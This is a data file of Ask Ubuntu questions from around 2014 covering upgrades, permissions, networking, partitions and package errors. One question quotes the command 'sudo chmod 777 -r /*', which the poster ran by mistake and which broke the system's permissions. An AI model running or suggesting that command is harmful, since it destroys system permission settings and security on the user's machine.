408984	upgrade from ubuntu 12.04 to 13.10 with live usb	as the title underlines it , i do not know how to upgrade from a ubuntu 12.04 precise to ubuntu 13.10 saucy . i have made my own research , and it turns out that i have to upgrade to 12.10 quantum , then 13.04 raring then 13.10 saucy . however , 800 mb for each upgrade is a lot ... and i do not really have to time to do this ... so i downloaded a stable version of ubuntu 13.10 saucy , and put it on a usb drive that successfully boots on my laptop ... so my question is : is there any way to install ubuntu 13.10 without loss of data from ubuntu 12.04 ? i have so many apps and i do not want to lose them ( data included ) . all solutions are welcome and i will comment them as soon as i tried a solution . oh ... and my laptop is an asus x551ca with windows 8.1 installed ... thank you for your time everyone !
408986	apache tomcat can not be started as a non-root user	i manually started apache tomcat 6 via the command $ catalina_home/bin/startup.sh and this is the result - using catalina_base : /home/getx/desktop/apache-tomcat-6.0.37 using catalina_home : /home/getx/desktop/apache-tomcat-6.0.37 using catalina_tmpdir : /home/getx/desktop/apache-tomcat-6.0.37/temp using jre_home : /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java using classpath : /home/getx/desktop/apache-tomcat-6.0.37/bin/bootstrap.jar however , when i enter localhost:8080 in firefox , nothing shows up . it works when i run the command via sudo . so i guessed it must be due to a permissions problem . these are my permissions for my current user - drwxr-xr-x 2 getx getx 4096 jan 18 12:50 bin drwxr-xr-x 3 getx getx 4096 jan 21 21:08 conf drwxr-xr-x 2 getx getx 4096 jan 18 12:50 lib -rw-r -- r -- 1 getx getx 37951 apr 29 2013 license drwxr-xr-x 2 getx getx 4096 jan 21 21:08 logs -rw-r -- r -- 1 getx getx 558 apr 29 2013 notice -rw-r -- r -- 1 getx getx 9188 apr 29 2013 release-notes -rw-r -- r -- 1 getx getx 16287 apr 29 2013 running.txt drwxr-xr-x 2 getx getx 4096 jan 18 12:50 temp drwxr-xr-x 7 getx getx 4096 apr 29 2013 webapps drwxr-xr-x 3 getx getx 4096 jan 21 21:08 work
408987	problem with terminal	i just installed ubuntu 12.04 on my laptop . i can not get the terminal to work properly . specifically , it will display symbols ( ~ , ! , @ , # , $ , % , ^ , & , * , ) etc ) , but it will not display any letters ( a , b , c , d , etc. ) . i can use the full keyboard in all other applications i 've tried .
408988	ubuntu touch ssh connection refused	running ubuntu touch on a nexus 4 . i 've installed ssh server and have followed the instructions available in the wiki to ssh into the phone , but it tells me connection is refused . doing the standard ssh phablet @ 192.168.x.x ( getting ip address from ifconfig ) . i 've made the image writable . i 've enabled ssh . now i 'm at a loss .
408989	problem connecting to internet with broadband using username & password in ubuntu 12.04	i am able to connect to internet with bsnl broadband with `` username & password '' option . ( netowrk connection- > dsl ) but the problem is 'show password ' option fails the very purpose of using password . and also after shutdown , when i connect again , password is not erased . password typed during earlier login remains . how to do like in windows wherein every time when we switch on the computer , you have to type the password & no option for `` show password '' . pl . help . however `` always on '' connection works fine without any issues .
408990	no menubar or launcher activity	i have dell xps l502x with grphics card nvidia geforce gt 540m . i installed cuda 5.5 in ubuntu 12.10 which contains nvidia graphics driver . after installing the desktop is like this . i tried ccsm and enabled ubuntu unity plugin but still problem remains . please help
408991	ubuntu installer says no internet , even though i do have internet	i 'm trying to upgrade my current ubuntu 13.04 installation to 13.10 by using a live usb . first , when trying to do the upgrade , the `` upgrade to 13.10 '' button was greyed out . to fix that , i need internet connection according to another question . however , the installer indicates that i do n't have internet connection , even though i am connected and can access the internet with firefox . how can this be fixed ? sorry if this question is a bit vague , i 'll provide more information if needed . edit : at first , for about a second , it shows `` connected '' , then it changes into the disconnected cross symbol . i 'm connecting with a wireless network on a live usb with persistence disabled ( enabled did n't help ) .
408992	gedit - files in file browser i never opened	typically , gedit has the file or folders i 've been recently working on in the file browser on the left side of the window . today , i opened gedit and found that it was listing things like `` pulse- ( trash characters ) '' , `` ssh- ( similar trash characters ) '' , and the /tmp folder . i 've not seen this behaviour before -- i certainly did n't open these files , and i 'm the only one who uses this computer . why would the file browser list these files ?
408993	ubuntu 12.04 black screen after some graphics related installs	i was having problems running opengl libraries in java and had the exact same error as here could not init glx in minecraft so i followed the instructions from the first answer . i also tried to install bumblebee https : //wiki.ubuntu.com/bumblebee as i remember i have n't done anything else . now i get the black screen when booting.i tried removing all installed packages listed , did n't work . then i tried most of the answers from here blank screen after installing nvidia restricted driver nothing works . i have onboard intelhd 3000 and separate nvidia 525m .
408994	ca n't log into data partition of drive 2 in computer 2 over lan , from computer 1	i am trying to move ( or copy ) a large tarball from my home directory on 12.04 computer1 to the sda6 directory on 12.04 computer2 . computer 2 boots from a 20gb partition on a ssd drive . sda6 is on a second drive on this computer which is a normal hdd . i have managed to share sda6 on samba on # 2 ( which will be my respository for data files ) and can find it in nautilus from # 1 , but when i try to log into it with my ( known to be correct ) password from # 1 to copy the file , i get this error message : '' unable to mount location failed to mount windows share '' do i need to mount the hdd in computer2 , and if so , how do i mount it ? i am assuming that it can be mounted anywhere , so will suggest /mnt/data . i am inexperienced in linux ( as my question doubtless reveals ) , so simple explanations and code will be appreciated .
408996	no hdd space left	i have 13.4gb hdd space for my ubuntu partition , and the only software that i use is thunderbird , firefox , and play on linux with ms office 2010 ( .playonlinux uses 2.6gb ) . i ca n't use ubuntuone because of the limited space i have left ( currently only 400mb is used ) . i do n't store any files on my ubuntu partition , but only from updating the os i got down to only 87mb free space , 'megabites ' , not gigabites . i 've run bleachbit a few times in the last few months and it can only recover about 250mb each time . i 've run disk usage analyser , and it says that 4gb is used in home/.encryptfs/myname/.private really , i do not store any files on the computer itself , but make them available to both oss on an external hard drive and usb memory sticks . i 'm currently running 12.04 lts ( 64bit ) , and currently i would n't be able to upgrade to 14.04 lts with only this tiny bit of space left . how do i fix this ?
408997	`` upgrade ubuntu 13.04 to ubuntu 13.10 '' is greyed out	i booted from a live usb , however when trying to upgrade the upgrade option is greyed out . additionally , the installer reports that there is no internet ( asked here ) . how can this be fixed ?
408998	how can i create a hardened virtualbox image for pentesting ?	as a serious security researcher , i 'm looking for an answer to securing a ubuntu installation against unwanted intrusion . this should include how i can : log and alert remote connection attempts log and alert when a file changes , as well as restoration of those files on request . is it necessary to harden the tcp/ip stack of the machine ? my end use case scenario is going to be in virtualbox for ease of restoration , so it would be great to know what i need to do to get the image started . would the following iptable definitions work the same as fail2bans purpose ? : $ iptables -n in_ssh $ iptables -a input -p tcp -- dport ssh -m conntrack -- ctstate new -j in_ssh $ iptables -a in_ssh -m recent -- name sshbf -- rttl -- rcheck -- hitcount 3 -- seconds 10 -j drop $ iptables -a in_ssh -m recent -- name sshbf -- rttl -- rcheck -- hitcount 4 -- seconds 1800 -j drop $ iptables -a in_ssh -m recent -- name sshbf -- set -j accept $ iptables -a input -p tcp -- dport ssh -m conntrack -- ctstate new -j in_ssh ps . would some one give the code to properly box off scripting ?
408999	how do i upgrade releases from a live usb with the command line ?	if i create a live cd/usb and boot from that , is there any way that an existing system on the hard drive can be upgraded by use of the command line , and not the ubiquity installer ?
409000	how to intall python library from a repository	i 'm a long time windows user who has made the plunge to ubuntu . some things i like , somethings i do n't like and most ... well most i just do n't understand as of yet . i mostly get apt-get . groovy . i mostly get the software center . less groovy usually breaks , but whatever . one thing i ca n't get at all is manually installing packages for which apt-get does not work . the file structure and layout of ubuntu is really odd to me . i have a python library i need to install . it 's not one that you can get through apt-get or pip . fyi it 's here : https : //github.com/opendns/dnspython-clientsubnetoption so i can download a zip file . great . as far i can tell i have to then extract it to usr/share/doc ( at least this is where i find the other libraries i have been able to install for python through apt-get ) . i have no idea how to do this though since the gui does n't want to let me do anything that 's not in my account folder and as far as i can tell the usr is some completely disconnected file structure when it comes to a terminal ( i ca n't simply back up a level from my user account to usr for instance ) . what 's the right way to install said library then ?
409001	installed packages have unmet dependencies	when i tried to install lxc-docker-0.7.6 on ubuntu 13.04 , i get the following errors : the following package was automatically installed and is no longer required : libsdl-ttf2.0-0 use 'apt-get autoremove ' to remove it . the following new packages will be installed : lxc-docker-0.7.6 0 upgraded , 1 newly installed , 0 to remove and 61 not upgraded . 1 not fully installed or removed . need to get 2,681 kb of archives . after this operation , 14.4 mb of additional disk space will be used . get:1 http : //get.docker.io/ubuntu/ docker/main lxc-docker-0.7.6 amd64 0.7.6 [ 2,681 kb ] fetched 2,681 kb in 3s ( 857 kb/s ) ( reading database ... 171665 files and directories currently installed . ) unpacking lxc-docker-0.7.6 ( from ... /lxc-docker-0.7.6_0.7.6_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/lxc-docker-0.7.6_0.7.6_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/docker ' , which is also in package docker 1.4-5ubuntu1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/lxc-docker-0.7.6_0.7.6_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
409002	server disk encrpytion prevents connection after ssh remote reboot	newbie here . i am running ubuntu server 12.04 lts on an old machine for a home server project using a static ip address . running openssh server on it enables me to connect remotely from my windows7 laptop through putty client . works great except for a big obstacle . when i installed the server 's operating system i choose logical volume management with encryption . if i need to reboot the server remotely due to some changes it of course prompts for a passphrase to unlock the disk . during this time it is impossible to remotely connect via ssh ( i assume because the ssh server is n't started yet and things are encrypted ) . how do i get around this ? i ca n't be the only one that has this problem . thank you in advance !
409006	iwconfig does n't report link quality unless run as sudo	i 'm running ubuntu 13.10 on a late 2013 macbook pro retina ( booted via refind ) . my issue is that running iwconfig does n't output link quality or signal level unless run as sudo . me : ~ $ sudo iwconfig eth0 ieee 802.11abg essid : '' redacted_essid '' mode : managed frequency:2.447 ghz access point : re : da : ct : ed : xx : xx bit rate=144 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=70/70 signal level=-35 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lo no wireless extensions . not as sudo : me : ~ $ iwconfig eth0 ieee 802.11abg essid : '' redacted_essid '' mode : managed frequency:2.447 ghz access point : re : da : ct : ed : xx : xx retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . is this normal , and is there something i can do to make it work without super user permissions ? my reason is that the vicious wifi widget for awesome window manager expects to be able to query iwconfig for this information not as root : http : //git.sysphere.org/vicious/tree/widgets/wifi.lua thanks so much .
409007	why does n't system monitor show activity over ethernet connections ?	in the network history graph of system monitor , network activity over wi-fi shows up fine , but activity over wired ethernet does n't show up at all . using lspci , my ethernet adapter shows up as follows : 02:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) is there any way to fix this ? to be absolutely clear , i am having no problems with the network connection itself , i just am unable to monitor its activity .
409008	why windows c drive not available in ubuntu 12.04 ?	i have a a dual boot system with windows 7 and ubuntu 12.04 . i can see only my windows drive ( which appears as 10 gb file system ) , but not the c drive . fdisk -l gives the following disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x9c879c87 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 135821311 67807232 7 hpfs/ntfs/exfat /dev/sda3 135821312 156299263 10238976 7 hpfs/ntfs/exfat any suggestions ?
409010	unity and dash have disappeared	i have a headless ubuntu machine at home that i usually ssh or vnc into . i 've been using it for over six months and things were going great . suddenly , two weeks ago , when i reboot the system after installing a few updates , unity and dash do n't appear on my vnc window anymore . i have n't been able to see if they appear when a monitor is plugged in , but i had no issues with unity and dash for over 6 months ! i 'm using ubuntu 12.04 . i 've tried various things ( changing compiz settings , restarting lightdm etc . ) and have been looking up online for a solution for two weeks now and have n't been able to find anything . the following is the output i get when i type unity into terminal ( since i 'm vncing into the system , i type in 'export display=:1 ' right before typing 'unity ' ) : compiz ( core ) - fatal : no xkb extension checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - fatal : no composite extension compiz ( composite ) - error : initscreen failed compiz ( core ) - error : could n't activate plugin 'composite' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - error : initplugin 'opengl ' failed compiz ( core ) - error : could n't activate plugin 'opengl' compiz ( core ) - error : plugin 'composite ' not loaded . compiz ( core ) - fatal : no composite extension compiz ( core ) - fatal : no composite extension segmentation fault ( core dumped ) i appreciate all help finding a solution for this . let me know if you want me to post any other information to better assess this problem .
409012	package manager error	i am getting a problem in ubuntu as an error opening the cache , the list of software sources could not be read in my /etc/apt/sources.list file and the package lists or status file could not be parsed or opened . i am new to ubuntu , so i could not determine what is causing the problem . i also have a problem opening the ubuntu software center and once i commented out line no . 56 stating deb http : //archive.canonical.com/raring partner , ubuntu software center opens ok. what could the problem be ? i am including 4 lines from my sources.list file . source.list code on my line 56 is this : deb http : //archive.canonical.com/raring partner # deb-src http : //archive.canonical.com/raring partner # deb-src http : //archive.canonical.com/raring partner # deb-src http : //archive.canonical.com/raring partner terminal output : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/gi/overrides/glib.py '' , line 629 , in < lambda > return ( lambda data : callback ( *data ) , user_data ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 261 , in open self._cache = apt.cache ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . 2014-01-22 11:27:29,685 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( )
409013	how do you create an app profile for ufw ?	ufw has a command that lists out profiles to which you can further explore their profile definitions $ ufw app list and $ ufw app profile { app profile title } i was wondering how you can create a profile for an undefined program , like virtual box and have that profile run the same definitions i have given iptables for my ubuntu distro . not only am i trying to use ubuntus firewall to service my virtual machine . i am also sincerely curious as how to create a profile for an application that does n't come with one .
409015	software centre and update manager reporting errors	i am a new user of ubuntu and am running version 12.04 side by side with windows . while that my office is fine , the one i installed in my home laptop started misbehaving recently . 1 . software update centre , update manager and almost anything inherent with ubuntu is crashing on start up . when i tried to repair them via terminal , i got the error message below . i tried the steps here how do i fix a `` problem with mergelist '' or `` status file could not be parsed '' error when trying to do an update ? and i keep getting same error message . e : malformed line 6 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read .
409019	what makes a linux distro a `` linux distro '' and not a `` new '' os ?	like how some linux distros might use different core components and what not , function completely different than another distro and what not , what is it exactly that keeps a distro from actually being a completely new os ? what is it exactly that makes all linux distros , well ... linux ?
409020	how to upgrade ubuntu in multiple sessions ?	we can apply updates in multiple sessions . that is , if i have 10 updates , i can install 4 on one day and remaining 6 on some other day . is the same also possible with upgrade ? so can i download some part of upgrade in first session , later in second and then apply it ? this can be useful when it is impossible , or difficult to download large data ( generally more than 750 mb ) in a single go ( due to speed drops , data limits etc ) . currently i am using ubuntu 12.10 and i want to upgrade to 14.04 . many users in asia and africa rely on connections with limited data , which are slow and discontinuous.ability to upgrade in multiple session can be of great help to all such users .
409021	an easier way to launch jpcsp	so im getting aggravated that i need to open a terminal and type seal @ seal-dimension-4700 : ~ $ cd /home/seal/jpcsp seal @ seal-dimension-4700 : ~/jpcsp $ start-linux-x86.sh im wondering if there is a way to make a quick launch so i can skip all that and just launch it from a shortcut ?
409022	what 's wrong with my partition table ?	my ubuntu os does not recognise any external drives or devices . this started after i installed windows xp . when i run gparted , it shows `` unallocated 465.76 gib '' . i ran `` sudo fdisk -l -u /dev/sda '' and this is what i got- device boot start end blocks id system /dev/sda1 4001790 108857343 52427777 5 extended partition 1 does not start on physical sector boundary . /dev/sda2 45946880 108857343 31455232 83 linux /dev/sda3 * 108872505 171766979 31447237+ 7 hpfs/ntfs/exfat partition 3 does not start on physical sector boundary . /dev/sda4 171771904 976773119 402500608 7 hpfs/ntfs/exfat /dev/sda5 4001792 45944831 20971520 83 linux i ca n't figure out what 's wrong with my partition table . please help . this is a screenshot of gparted : -
409025	permission denied when running .sh scripts	./geany_run_script.sh : 5 : ./geany_run_script.sh : ./area_circumference : permission denied program exited with code : 126 . this problem always occur when i try to execute my code . what might be the solution ?
409028	how do i switch from ubuntu back to chrome os ?	i have 13.10 installed and im stuck on ubuntu and have it as my default load up as ubuntu . whats the commands to get back ? i have tried everything i seen on other websites but im still haveing some trouble so please help me . im on a acer 710 chrome book .
409029	bash script , cannote replace string in a file with escaped $ and &	i have creatd a shell script which takes a string as input . if the string contains ' $ ' or ' & ' , then i need to raplace those characters with '\ $ ' and '\ & ' . i could done that with sed command . after this i want to replace a word in a particular text file with that corresponding string . please see this section for more clarification . this is my file . test.txt hello my root password is root . now , i want to change the word root with a string . the string can be anything which may include special characters like $ or & . if i want to replace root with the string my & rootpa $ $ , then it should looks like my\ & rootpa\ $ \ $ in text file . this is my shell scipt # ! /bin/bash dothis ( ) { rootpass= $ ( echo `` $ 1 '' | sed -r 's/\ $ /\\ $ /g ' ) ; rootpass= $ ( echo `` $ rootpass '' | sed -r 's/\ & /\\ & /g ' ) ; echo $ rootpass ; sed -i `` s/root/ $ rootpass/g '' test.txt } dothis `` my & rootpa $ $ '' ; this script works properly upto echo $ rootpass , which means when i echo the string it will display my\ & rootpa\ $ \ $ . but in the file it looks my & rootpa $ $ instead of my\ & rootpa\ $ \ $ . whats wrong with the script . please advice .
409033	ca n't get past login screen .	i have installed ubuntu 12.04 on virtualbox for testing purpose . i was installing vnc4server and i followed the commands below apt-get install vnc4server xinetd fluxbox cp /etc/apt/sources.list /etc/apt/sources.list_backup gedit /etc/apt/sources.list and replaced source.list contents with the content in this link . then sudo apt-get update this gave several unsuccessful update , so i rolled back the changes i made with source.list from the copy i saved as sources.list_backup and did update sudo apt-get update but unfortunately after a some time i rebooted the ubuntu 12.04 and now i can not pass my user login screen . it repeatedly asks for my password and not giving an error . if i enter a wrong password it says `` error '' . i can go into recovery mode in my boot loader and access `` role to root shell prompt '' root command line . also i have a option in recovery mode saying `` the system is running in low-graphics mode '' , that option is `` failsafex - run in failsafe graphic mode '' i have tried doing uninstalling those packages i installed initially from the root shell prompt command line in recovery mode . hope it still remains after a reboot again . boot-repair using the iso file following this link .
409034	sudo : must be setuid root	i get the file parmission on my folder , so i run the following command sudo chmod 777 -r /* and get some error line . then i try to login as root user by the following command sudo su get this error like as supravat @ supravat : ~ $ sudo su sudo : must be setuid root then i research regarding this error . and followed some source but error is still present . http : //www.linuxquestions.org/questions/linux-software-2/sudo-must-be-setuid-root-854117/ when i run following commend as like chown root : root /usr/bin/sudo get this mesasage.. chown : changing ownership of '/usr/bin/sudo ' : read-only file system please help me .
409035	can firewall be used inorder to redirect users accessing my hotspot	is it possible to use firewall in ubuntu inoder to block or redirect users who are accessing my laptops wifi.. ? if yes then how ? ? i am using ubuntu 13.04 .
409038	install ubuntu via wubi and ca n't using wireless on dell inspiron 3421 core i3	after install ubuntu via wubi , to using dual booting and try to use ubuntu , i ca n't using wireless . now , i just using cable to connect internet but is n't comfort when i 'm persentation . please support us for solving this problem . thanks
409039	problem while running script	i am getting error while running kafka-zookeeper script . command i tried to run the script is root > /etc/init.d/kafka-zookeeper start problem 2014-01-22 13:05:26,683 ] fatal severe unrecoverable error , exiting ( org.apache.zookeeper.server.zookeeperserver ) java.io.filenotfoundexception : /tmp/zookeeper/version-2/snapshot.12 ( permission denied ) at java.io.fileoutputstream.open ( native method ) at java.io.fileoutputstream. < init > ( fileoutputstream.java:221 ) at java.io.fileoutputstream. < init > ( fileoutputstream.java:171 ) at org.apache.zookeeper.server.persistence.filesnap.serialize ( filesnap.java:224 ) at org.apache.zookeeper.server.persistence.filetxnsnaplog.save ( filetxnsnaplog.java:257 ) at org.apache.zookeeper.server.zookeeperserver.takesnapshot ( zookeeperserver.java:259 ) at org.apache.zookeeper.server.zookeeperserver.loaddata ( zookeeperserver.java:254 ) at org.apache.zookeeper.server.zookeeperserver.startdata ( zookeeperserver.java:366 ) at org.apache.zookeeper.server.nioservercnxn $ factory.startup ( nioservercnxn.java:160 ) at org.apache.zookeeper.server.zookeeperservermain.runfromconfig ( zookeeperservermain.java:110 ) at org.apache.zookeeper.server.zookeeperservermain.initializeandrun ( zookeeperservermain.java:85 ) at org.apache.zookeeper.server.zookeeperservermain.main ( zookeeperservermain.java:51 ) at org.apache.zookeeper.server.quorum.quorumpeermain.initializeandrun ( quorumpeermain.java:108 ) at org.apache.zookeeper.server.quorum.quorumpeermain.main ( quorumpeermain.java:76 ) note permission is cmd > ls -ld /etc/init.d/kafka-zookeeper -rwxr-xr-x . 1 root root 1470 jan 22 12:45 /etc/init.d/kafka-zookeeper /tmp/zookeeper/version-2/snapshot.12 file is present only permission problem . i am new to bash script . any help will be great .
409040	have connection but no internet	i 'm connected to my wireless network but unable to connect to the internet . i restart my laptop several time but nothing happened . if i attempt to browse a web ( or do anything else that requires an internet connection ) , i get a `` server not found '' error.i do n't think the problem is with the network or the hardware , because if i boot into windows , everything is fine . and also this is the output of ifconfig : eth0 link encap : ethernet hwaddr 10 : bf:48:48:84:63 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:68 errors:0 dropped:0 overruns:0 frame:0 tx packets:68 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:5092 ( 5.0 kb ) tx bytes:5092 ( 5.0 kb ) wlan0 link encap : ethernet hwaddr 44:6d:57 : c6:2f:04 inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :466d:57ff : fec6:2f04/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7 errors:0 dropped:0 overruns:0 frame:0 tx packets:57 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2482 ( 2.4 kb ) tx bytes:10856 ( 10.8 kb ) , $ ping -c3 www.google.com ping : unknown host www.google.com , $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.1.1
409041	adding unallocated parition to an extened parition	i am trying to extend my ubuntu partition . this is what my partitions looks like , so i booted to live cd and used gparted to work with the partition . my problem now is that i deleted the swap partition as instructed here . but my problem is i was told i ca n't add new partition , and now i am stuck not sure how to procede i wanted to add the 101.86gb unallocated to my ubuntu install located at /dev/sda5 also i am dual booting with windows 7 /dev/sda3
409044	how to create stick figure drawings on ubuntu ?	i want to make stick figure drawings on my ubuntu , can you guys recommend any software for it ? there is pivot for windows but not sure it is available on ubuntu thanks
409045	unsuccessful mounting of external memory - can not access files	at work there is an ubuntu 12.04 server with 2 internal hard drives ( 1.0tb and 2.0tb ) , 2 external hard drives ( 2.0tb and 4.0tb ) , and a 32gb usb memory that is used as swap . it 's kind of a complicated setup , so i suppose they just kept on adding stuff when memory filled up . my user session is assigned to a partition on the external 4.0tb drive . it was running quite slow lately so i attempted to reboot , but it froze during shutdown , so i shut it down manually by cutting the power supply ( not a good thing , but there was no other option i was aware of ) . now when i try to boot the system , i get the following message : swapon : /dev/sde1 : read swap header failed : invalid argument mountall : swap on /dev/sde1 [ 1049 ] terminated with status 255 mount all : problem activating swap : /dev/sde1 /dev/sdc1 : clean , 201/40697856 files , 2604786/162790314 blocks /dev/sdc2 : clean , 17/40697856 files , 141991259/162790321 blocks /dev/sdc3 : clean , 870/40697856 files , 53137157/162790322 blocks the disk drive for /home/member/usb_disk/disk1 is not ready yet or not present . continue to wait , or press s to skip mounting or m for manual recovery _ if i skip s , other partitions also give the same problem . i can still boot ubuntu but without the hard drives , my user session is obviously empty . so this time i pressed m for manual recovery in root mode , but now i 'm not sure what to do . here are the contents of /etc/fstab : # /etc/fstab : static file system information . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # /dev/sda10 uuid= [ ... ] / ext4 errors=remount-ro 0 1 # /dev/sda1 uuid= [ ... ] /boot ext4 defaults 0 2 # /dev/sda6 uuid= [ ... ] /home ext4 defaults 0 2 # /dev/sda9 uuid= [ ... ] none swap sw , pri=0 0 0 # /dev/sda8 uuid= [ ... ] /home/member/data ext4 defaults 0 2 # /dev/sdb1 uuid= [ ... ] /home/member/data2 ext4 users 0 2 # /dev/sdd2 uuid= [ ... ] /home/member/usb_disk/disk1 vfat users , uid=1001 0 2 # /dev/sdd3 uuid= [ ... ] /home/member/usb_disk/disk2 ext4 users 0 2 # /dev/sdd4 uuid= [ ... ] /home/user1/data ext4 defaults 0 2 # /dev/sdd5 uuid= [ ... ] /var/www ext4 defaults 0 2 # /dev/sdc1 uuid= [ ... ] /media/backup1 ext4 defaults 0 2 # /dev/sdc2 uuid= [ ... ] /media/backup2 ext4 defaults 0 2 # /dev/sdc3 uuid= [ ... ] /media/backup3 ext4 defaults 0 2 /dev/sde1 none swap sw , pri=1 0 0 /dev/sdf1 /home/user2 ext3 defaults 0 2 /dev/sdf2 /home/user3 ext3 defaults 0 2 '' user3 '' in the last line is me , so my files are usually located in /dev/sdf2 . when i run fsck -f , it tells me that the following disks are mounted . note that this is a simplification of the output , it actually gives me a warning saying that the system is mounted and i will risk damaging the system , do i want to proceed anyway ( y/n ) ? - to which i press ( n ) . in most cases it then tells me that the disk is mounted : /dev/sda10 is mounted . /dev/sda1 is mounted . /dev/sda6 is mounted . /dev/sda8 is mounted . /dev/sdb1 is mounted . fsck.ext4 : unable to resolve 'uuid= [ id for /dev/sdd3 ] ' fsck.ext4 : unable to resolve 'uuid= [ id for /dev/sdd4 ] ' fsck.ext4 : unable to resolve 'uuid= [ id for /dev/sdd5 ] ' /dev/sdc1 is mounted . /dev/sdc2 is mounted . /dev/sdc3 is mounted . fsck.ext3 : no such file or directory while trying to open /dev/sdf1 possibly non-existent device ? fsck.ext3 : no such file or directory while trying to open /dev/sdf2 possibly non-existent device ? what can i do next ? it is of vital importance that i do not erase any data .
409050	smplayer does n't show the formatting from the ass files	i have smplayer on ubuntu 13.10 and it works perfectly , but when i tried to play a video with an ass file '' arabic language '' , it does n't show the correct font formatting from the subtitle file , instead all the subtitles appears in the middle of the screen with only one font . when i tried to install vlc player and gnome player both showed the correct formatting and font and as long as i know both smplayer and gnome player use the same bases to work ( both are gui for mplayer ) so how ca n't smplayer show the subtitles like gnome ? , so i tried to re-install smplayer , but it does n't solve the problem . and i searched a lot but could n't find this problem facing someone else , and for me smplayer is better than vlc and gnome player . sorry for my simple language but i am a new user to ubuntu and do n't have much technical information . i can also put pictures to show the difference .
409053	beerorkid repositories does n't work	reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist / var/lib/apt/lists/www.beerorkid.com_compiz_dists_dapper_main-amd64_binary-i386_packages e : could not parse or open package lists or status file . how to fix ? because of this , it open almost nothing i try to do an update and ... e : error with gpg : http : //www.beerorkid.com dapper release : the following signatures were invalid : nodata 1 nodata 2
409061	problem installing packet fence	i am installing packet fence on ubuntu 13.04 by following this tutorial and i 'm getting error as some packages are broken . this is what i have added in my packetfence.list file as given on the tutorial deb http : //inverse.ca/downloads/packetfence/ubuntu precise precise i think problem is with precise since it is an 12.04 and i 'm using ubuntu 13.04 and i do n't know what i 'm supposed to add in place of precise .if i add raring in place of precise it gives me an warnning saying /media/ankita/osfyjune13/boot/other_isos/ubuntu-13.04-server-amd64.iso wat shuld i add in my packetfence.list ?
409062	is it possible to merge multiple gnome-terminal windows into a single tabbed view ?	i had 2 tabs open in gnome-terminal and i detached them by dragging the tab away . now i have 2 gnome-terminal tabs with my work present , and i would like to clean up my desktop clutter - is there a way to merge them back into a single view ? what it 's doing : what i want :
409063	how do i boot a usb-cd/dvd drive from the grub ?	i have a laptop running ubuntu 12.04 and want to install windows 7 alongside it , but the bios is locked down and as such wo n't boot of a usb-dvd drive with the windows 7 boot cd in it plugged in . the question is , how do i boot off the cd in this drive from the grub , if it is possible at all ?
409064	what 's wrong with ubuntu to install package	when i try to install any package through the command line , i get an error . can anyone help me on this ? reading package lists ... done building dependency tree reading state information ... done e : unable to locate package update e : unable to locate package fpc i have try sudo add-apt-repository `` deb http : //archive.ubuntu.com/ubuntu $ ( lsb_release -sc ) universe '' sudo apt-get update sudo apt-get install fpc but i get eror like this picture https : //imageshack.com/i/jt4ug9p
409066	how to install andoid sdk for ubuntu 13.10 ?	hellow i am a new ubuntu 13.10 user , i downloaded android sdk from here : http : //developer.android.com/sdk/index.html but i do n't know how to install it and make it work with netbeans 7.4 .
